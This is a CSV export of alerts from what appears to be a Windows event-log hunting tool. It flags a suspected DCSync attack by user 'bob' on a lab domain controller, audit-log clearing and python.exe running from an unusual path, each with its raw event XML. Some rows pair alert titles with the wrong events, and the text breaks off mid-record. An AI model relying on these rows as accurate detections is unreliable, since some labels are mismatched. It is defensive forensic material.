<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.024634Z"">
</TimeCreated>
<EventRecordID>198242595</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""3616"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">AF3067E0-BB6F-47C2-AA20-F3F458797F38</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14674</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Audit log cleared,1557594610.60807,2020-09-02T15:47:48.570502+04:00,,Audit,Critical,"User Name : ( IEUser ) with process : ( C:\Python27\python.exe ) run from Unusual location , check the number and date of execution in process execution report",4688,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4688</EventID>
<Version>1</Version>
<Level>0</Level>
<Task>13312</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-11T17:10:10.342445Z"">
</TimeCreated>
<EventRecordID>18196</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""4"" ThreadID=""44"">
</Execution>
<Channel>Security</Channel>
<Computer>IEWIN7</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
<Data Name=""SubjectUserName"">IEUser</Data>
<Data Name=""SubjectDomainName"">IEWIN7</Data>
<Data Name=""SubjectLogonId"">0x13765</Data>
<Data Name=""NewProcessId"">0x4f0</Data>
<Data Name=""NewProcessName"">C:\Python27\python.exe</Data>
<Data Name=""TokenElevationType"">%%1938</Data>
<Data Name=""ProcessId"">0x12c</Data>
<Data Name=""CommandLine""></Data>
</EventData>
</Event>",01566s-win16-ir.threebeesco.com,Security
Process running in Unusual location,1599047268.570502,2019-05-11T21:10:10.608070+04:00,,Threat,High,Audit log cleared by user ( a-jbrown ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2020-09-02T11:47:39.499106Z"">
</TimeCreated>
<EventRecordID>2171289</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""420"" ThreadID=""996"">
</Execution>
<Channel>Security</Channel>
<Computer>01566s-win16-ir.threebeesco.com</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-308926384-506822093-3341789130-1106</SubjectUserSid>
<SubjectUserName>a-jbrown</SubjectUserName>
<SubjectDomainName>3B</SubjectDomainName>
<SubjectLogonId>0x38a14</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",IEWIN7,Security
Dcsync Attack detected,1553549341.035686,2019-03-26T01:29:01.035686+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.026630Z"">
</TimeCreated>
<EventRecordID>198242605</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""3300"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">9F3DCF8F-49DF-4DB9-AA5F-09B804ADDD96</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14674</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Audit log cleared,1557594610.342445,2019-05-11T21:10:10.342445+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-11T17:10:06.342445Z"">
</TimeCreated>
<EventRecordID>18195</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""780"" ThreadID=""3812"">
</Execution>
<Channel>Security</Channel>
<Computer>IEWIN7</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns:auto-ns3=""http://schemas.microsoft.com/win/2004/08/events"" xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-3583694148-1414552638-2922671848-1000</SubjectUserSid>
<SubjectUserName>IEUser</SubjectUserName>
<SubjectDomainName>IEWIN7</SubjectDomainName>
<SubjectLogonId>0x1371b</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",IEWIN7,Security
Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.026630Z"">
</TimeCreated>
<EventRecordID>198242604</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""2868"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">9F3DCF8F-49DF-4DB9-AA5F-09B804ADDD96</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14675</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.026630Z"">
</TimeCreated>
<EventRecordID>198242603</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""2868"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">98E50F6A-AE61-4BFF-A9F0-CCFA5CCB555C</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04f